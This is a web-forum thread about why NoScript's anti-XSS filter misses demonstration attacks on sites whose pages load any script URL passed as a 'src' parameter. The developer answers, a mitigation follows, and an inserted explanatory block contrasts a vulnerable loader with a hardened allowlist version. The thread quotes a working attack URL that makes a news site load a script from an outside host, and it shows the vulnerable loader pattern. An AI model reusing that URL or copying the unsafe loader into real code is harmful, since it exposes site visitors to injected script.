XSS examples not blocked by Noscript?
I just learned about
http://davidlynch.org/blog/2011/10/xss-is-fun/
which provides some XSS examples for several popular websites.
These examples only work if davidlynch.org is also whitelisted, so we are protected by default. Nevertheless, shouldn't the XSS filter of Noscript stop these examples even if the originating site is whitelisted?
Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Re: XSS examples not blocked by Noscript?
Neat, http://news.cnet.com/, heh.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 5.1; rv:9.0a2) Gecko/20111017 Firefox/9.0a2 SeaMonkey/2.6a2
Re: XSS examples not blocked by Noscript?
therube wrote:
> Neat, http://news.cnet.com/, heh.

Yes, all of these examples are funny. But since http://noscript.net/features#xss says:

> Furthermore, NoScript's sophisticated InjectionChecker engine checks also all the requests started from whitelisted origins for suspicious patterns landing on different trusted sites: if a potential XSS attack is detected, even if coming from a trusted source, Anti-XSS filters are promptly triggered.

.... we shouldn't be able to see them, or, at least, we should get a warning. Or am I missing something?
Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Re: XSS examples not blocked by Noscript?
tlu wrote:
> These examples only work if also davidlynch.org is whitelisted

Actually both davidlynch.org & the "host" domain need to be Allowed.
And given that, I suppose that is why NoScript does not notify.
One would not normally allow davidlynch.org & so in these cases the exploit would never occur.
If you were not a NoScript user, JavaScript would be allowed everywhere, in all cases, so his exploits would "just work".
Being a NoScript user, his exploits fail.
In order to force the exploit to work, you need to allow both domains, & in doing so it is no longer an exploit (to NoScript) because you have allowed (agreed) to be exploited.
XSS sample with warning, here.
Actually his exploit code looks to not work in IE8?
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 5.1; rv:9.0a2) Gecko/20111017 Firefox/9.0a2 SeaMonkey/2.6a2
Re: XSS examples not blocked by Noscript?
therube wrote:
> tlu wrote:
> > These examples only work if also davidlynch.org is whitelisted
> Actually both davidlynch.org & the "host" domain need to be Allowed.

That's what I wrote above.

> And given that, I suppose that is why NoScript does not notify.

I think it should, considering the quotation in my last post.

> One would not normally allow davidlynch.org & so in these cases the exploit would never occur.

Absolutely. The question is only why the Noscript InjectionChecker doesn't recognize the request as a potential XSS attack "even if coming from a trusted source".

> XSS sample with warning,

Yes, that's what I expected to see.
Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
- Giorgio Maone
- Site Admin
- Posts: 9455
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
- Contact:
Re: XSS examples not blocked by Noscript?
If you looked at the attack URLs, e.g.
http://www.foxnews.com/eyewonder/interim.html?src=http://davidlynch.org/projects/xss/eyewonder.js
you'd see that NoScript's XSS filter can't do anything specific to block them, because otherwise no redirection service or any other web application which takes absolute URLs as parameters (e.g. URL shorteners, or any blog comment form) would work.
The problem here is the incredible stupidity of the developers of those sites, who have implemented their page to load any script whose address is passed as the src query string parameter.
In other words, no Javascript code is passed in the request, just an "innocent" URL which the page idiotically turns into a script source.
Fortunately enough, as you noticed, this kind of setup (which bypasses any XSS filter because it's technically not a "regular" XSS) still cannot work unless the attacker's script source (which necessarily belongs to a URL different than the attacked site) is allowed.
Mozilla/5.0 (Windows NT 5.2; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
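The loader pattern Giorgio describes, as an added example that is not code from the thread, from the affected sites or from NoScript: a page takes its `src` query parameter and uses it as an external script source, so the request carries no JavaScript at all, only a URL, and a filter that looks for injected script syntax has nothing to strip. The hardened version beside it resolves the parameter against the page URL and accepts it only when its origin is on an allowlist; the function names, the `example.com` origins and the test inputs are constructed for this example.

```javascript
// Added example, not from the thread or from NoScript. The origins below are
// constructed; "ads.example.com" stands in for the site's own legitimate
// script host.
const ALLOWED_SCRIPT_ORIGINS = new Set([
  "https://www.example.com",
  "https://ads.example.com",
]);

// Vulnerable form: whatever URL is in ?src= is handed back unchanged and then
// turned into a <script src>. The request contains a plain URL, not script
// syntax, which is why a request-side XSS filter has nothing to recognize.
function vulnerableScriptSource(queryString) {
  const params = new URLSearchParams(queryString);
  return params.get("src");
}

// Hardened form: parse the parameter as a URL relative to the page, then
// accept it only if it is https and its origin is allowlisted. A relative
// path resolves to the page's own origin; other hosts, protocol-relative
// "//host" values and javascript:/data: schemes are all rejected.
function safeScriptSource(queryString, pageUrl) {
  const params = new URLSearchParams(queryString);
  const raw = params.get("src");
  if (raw === null) return null;
  let parsed;
  try {
    parsed = new URL(raw, pageUrl);
  } catch {
    return null; // not a parseable URL at all
  }
  if (parsed.protocol !== "https:") return null;
  if (!ALLOWED_SCRIPT_ORIGINS.has(parsed.origin)) return null;
  return parsed.href;
}

// Browser-side use (illustrative; there is no document object in Node):
// const src = safeScriptSource(location.search, location.href);
// if (src !== null) {
//   const s = document.createElement("script");
//   s.src = src;
//   document.head.appendChild(s);
// }
```

The allowlist check is on `origin` rather than on a substring of the URL, so a value like `https://www.example.com.third-party.invalid/x.js` does not pass; checking `startsWith` on the string would.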
- GµårÐïåñ
- Lieutenant Colonel
- Posts: 3365
- Joined: Fri Mar 20, 2009 5:19 am
- Location: PST - USA
- Contact:
Re: XSS examples not blocked by Noscript?
tlu wrote:
> Absolutely. The question is only why the Noscript InjectionChecker doesn't recognize the request as a potential XSS attack "even if coming from a trusted source".

I guess you don't get what TRUSTED means which is to say that you are allowing it to do whatever because you TRUSTED it. Script injections are not that uncommon even by legitimate sources, and if you TRUST them, they can do it, if you don't, they can't. Simple enough, so I don't get why you are not getting this. If you have to allow a bad site for it to screw you over, then it was working just as it should and YOU chose to TRUST it to do what it needs to screw you over. Are we missing something here?
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/6.9 (Windows NT 6.9; rv:6.9) Gecko/69696969 Firefox/6.9
- Giorgio Maone
- Site Admin
- Posts: 9455
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
- Contact:
Re: XSS examples not blocked by Noscript?
tlu is right in his understanding that NoScript's XSS filter blocks XSS attacks even if they come from a source which is in your scripting whitelist.
In this case, though, this doesn't happen because there's no XSS payload to be stripped but just a URL which the victim site idiotically uses as a reference to an external script source.
Mozilla/5.0 (Windows NT 5.2; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
- GµårÐïåñ
- Lieutenant Colonel
- Posts: 3365
- Joined: Fri Mar 20, 2009 5:19 am
- Location: PST - USA
- Contact:
Re: XSS examples not blocked by Noscript?
Giorgio Maone wrote:
> tlu is right in his understanding that NoScript's XSS filters blocks XSS attacks even if they come from a source which is in your scripting whitelist.
> In this case, though, this doesn't happen because there's no XSS payload to be stripped but just a URL which the victim site idiotically uses as a reference to an external script source.

Correct, not arguing that. But anytime you have to explicitly allow something to work, even if it happens to be bad coding by the site, to have the exploit work on it, then the security tool is still preventing it even if using a different vector (in this case blocking a different domain and not letting it be governed by the trusted status of the idiot site) which may not be using the XSS engine because it doesn't qualify as one, but still the protection is there nonetheless unless you allow it to take advantage of that exploit.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/6.9 (Windows NT 6.9; rv:6.9) Gecko/69696969 Firefox/6.9
Re: XSS examples not blocked by Noscript?
GµårÐïåñ wrote:
> tlu wrote:
> > Absolutely. The question is only why the Noscript InjectionChecker doesn't recognize the request as a potential XSS attack "even if coming from a trusted source".
> I guess you don't get what TRUSTED means which is to say that you are allowing it to do whatever because you TRUSTED it. Script injections are not that uncommon even by legitimate sources, and if you TRUST them, they can do it, if you don't, they can't. Simple enough, so I don't get why you are not getting this.

Because you're much more intelligent than I am?

> If you have to allow a bad site for it to screw you over, then it was working just as it should and YOU chose to TRUST it to do what it needs to screw you over. Are we missing something here?

Yes, you are. There must be a reason why Giorgio constructed the XSS filter in such a way that it also blocks XSS attacks coming from trusted sites. If it were as simple as you suggest, this wouldn't have been necessary. And if I remember correctly, this feature didn't exist in earlier versions - it was introduced later. Again, there must be a reason why.

Anyway, it's a built-in feature, and my only question was why it doesn't work in these examples. "Simple enough, so I don't get why you are not getting this."
Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Re: XSS examples not blocked by Noscript?
Giorgio Maone wrote:
> you'd see that NoScript's XSS filter can't do anything specific to block them, because otherwise no redirection service or any other web application which takes absolute URLs as parameters (e.g. URL shorteners, or any blog comment form) would work.
> The problem here is the incredible stupidity of the developers of those sites, which have implemented their page to load any script whose address is passed as the src query string parameter.
> In other words, no Javascript code is passed in the request, just an "innocent" URL which the page idiotically turns into a script source.

Thanks, Giorgio, for this explanation. I understand what you're saying, and I agree that the risk is low as Noscript blocks it by default (= if the originating site isn't whitelisted). Nevertheless, I wonder if this technique can't be used for a new class of attacks if an attacker succeeds in manipulating the originating site, which might be a trustworthy and, thus, whitelisted website. In those examples the results were only funny, but other outcomes are conceivable.
Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
- Giorgio Maone
- Site Admin
- Posts: 9455
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
- Contact:
Re: XSS examples not blocked by Noscript?
tlu wrote:
> I wonder if this technique can't be used for a new class of attacks

Fortunately it's a very limited "class" of attacks, since using a parameter as the script source is something so stupid that I've never seen it before and hopefully will never see again (any developer with a clue understands that). The fact we've seen it on multiple sites at the same time is just due to their reliance on the same buggy tool.
That said, I'm gonna implement in the next dev build a further (pretty unique) mitigation, which can neutralize this attack even if the injected script source comes from a trusted origin.
Mozilla/5.0 (Windows NT 5.2; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Re: XSS examples not blocked by Noscript?
Giorgio Maone wrote:
> That said, I'm gonna implement in next dev build a further (pretty unique) mitigation, which will neutralize this attack even if the injected script source comes from a trusted origin.

That's really great! Giorgio, thank you very much!!
Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Re: XSS examples not blocked by Noscript?
tlu wrote:
> That's really great! Giorgio, thank you very much!!

+1, because strictly XSS or not, buggy tool or not, NS runs on this system to anticipate both the dangerous and the dumb.
Giorgio, we've already donated but not even the most expensive proprietary software offers such generous support as you and your team.
NS is priceless.
NS AMO Beta channel subscription.
Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
- Giorgio Maone
- Site Admin
- Posts: 9455
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
- Contact:
Re: XSS examples not blocked by Noscript?
Please check latest development build 2.1.8rc1
Mozilla/5.0 (Windows NT 5.2; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1